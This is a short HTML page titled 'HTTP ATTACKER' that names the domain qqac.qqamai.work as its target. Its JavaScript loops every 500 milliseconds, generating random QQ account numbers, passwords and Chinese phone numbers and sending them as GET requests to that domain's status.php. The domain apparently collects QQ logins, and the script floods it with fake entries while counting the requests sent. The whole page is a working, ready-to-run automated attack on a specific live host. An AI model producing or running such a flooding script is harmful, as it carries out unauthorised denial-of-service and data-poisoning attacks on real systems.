<!DOCTYPE html>
<html>

<head>
    <title>HTTP ATTACKER</title>
</head>

<body>
    <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
    <h1>攻击 qqac.qqamai.work</h1>
    <p>已发送数据：<span id="ppp">0</span> 次</p>
    <script>
        var c=0;
        function GetRandomNum(Min, Max) {
            var Range = Max - Min;
            var Rand = Math.random();
            return (Min + Math.round(Rand * Range));
        }
        function randomString() {
            var t = "ABCDEFGHJKMNPQRSTWXYZabcdefhijkmnprstwxyz2345678",
                a = t.length,
                n = "";
            for (i = 0; i < 11; i++) n += t.charAt(Math.floor(Math.random() * a));
            return n
        }
        function go() {
            var tel = GetRandomNum(13600000000, 13699999999);
            var qq = GetRandomNum(1000000000, 9999999999);
            var pass = randomString();

            axios.get("http://qqac.qqamai.work/status.php?action=add&u="+encodeURIComponent(qq)+'&p='+pass,"").then((res)=>{
                axios.get("http://qqac.qqamai.work/status.php?action=queren&id="+res.body.id+"&u="+encodeURIComponent('+86-'+tel));
            })
            c++;
            document.getElementById("ppp").innerHTML=c;
        }
        setInterval(go, 500);
    </script>
</body>

</html>